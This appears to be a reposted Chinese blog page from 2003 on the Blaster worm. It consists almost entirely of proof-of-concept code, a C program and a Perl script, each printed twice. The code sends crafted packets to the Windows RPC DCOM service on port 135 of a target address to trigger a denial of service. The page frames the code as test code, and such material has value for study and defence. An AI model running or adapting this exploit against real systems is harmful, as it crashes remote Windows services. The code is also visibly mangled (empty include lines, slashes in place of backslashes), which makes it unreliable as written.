冲击波病毒内幕点滴(2)
2003-09-10 11:03
489 查看
附1<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
测试代码
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org/n");
printf("Welcome to http://www.xfocus.net/n");
if(argc<2)
{
printf("useage:%s target/n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d/n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d/n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d/n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d/n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
#!/usr/bin/perl -w
# By SecurITeam's Experts
my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";
my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";
use Socket;
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");
$IP = $ARGV[0];
$target = inet_aton($IP);
$paddr = sockaddr_in(135, $target);
connect(S, $paddr) || die "connect: $!";
select(S); $|=1;
print $bindstr;
sleep(2);
print $request;
sleep(2);
select(STDOUT);
close(S);
测试代码
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org/n");
printf("Welcome to http://www.xfocus.net/n");
if(argc<2)
{
printf("useage:%s target/n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d/n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d/n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d/n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d/n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
#!/usr/bin/perl -w
# By SecurITeam's Experts
my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";
my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";
use Socket;
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");
$IP = $ARGV[0];
$target = inet_aton($IP);
$paddr = sockaddr_in(135, $target);
connect(S, $paddr) || die "connect: $!";
select(S); $|=1;
print $bindstr;
sleep(2);
print $request;
sleep(2);
select(STDOUT);
close(S);
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 冲击波病毒内幕点滴(3)
- 冲击波内幕点滴
- 嵌入式系统 Boot Loader 技术内幕
- 【简记】Java Web 内幕——Spring源码(组件分析,BeanFactory源码,Bean创建之前)
- 关于真真正正开始学习 单片机 四天以来的点滴收获
- Docker技术内幕1——容器技术浅析
- mysql调优及点滴记录
- spring技术内幕笔记:ApplicationContext和Bean的初始化及销毁
- 记录点滴18
- 实习点滴(6)--关于机器学习的一些有用的东西
- 【学习点滴-数据结构-栈&队列】 链式队列的实现及应用
- sql语句分析点滴
- MySQL 线程池内幕
- SQLSERVER 2005技术内幕:查询、调整和优化笔记第一章
- Spring技术内幕——深入解析Spring架构与设计原理(二)AOP
- 注册登录过程点滴(三):解决MVC3中使用Ajax.BeginForm会重复提交数据的问题
- 学习java点滴
- 【学习点滴-VIM】简明Vim练级攻略
- Spark学习笔记(31)Kafka原理内幕和集群构建与测试实战